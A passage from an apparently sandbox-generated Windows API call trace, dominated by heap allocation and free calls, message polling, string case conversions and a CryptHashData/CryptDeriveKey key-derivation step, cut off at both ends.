lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.451] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.451] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0254.452] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.453] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0254.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x24a9dc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.454] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.455] CryptHashData (hHash=0xaa5860, pbData=0x24b2bb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.456] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0254.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0254.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.457] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0254.458] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0254.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0254.459] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.460] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.460] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.460] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.461] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.461] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.461] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0254.461] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.461] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0254.461] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.461] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.462] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5860, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0254.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0254.463] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.463] PeekMessageW (in: 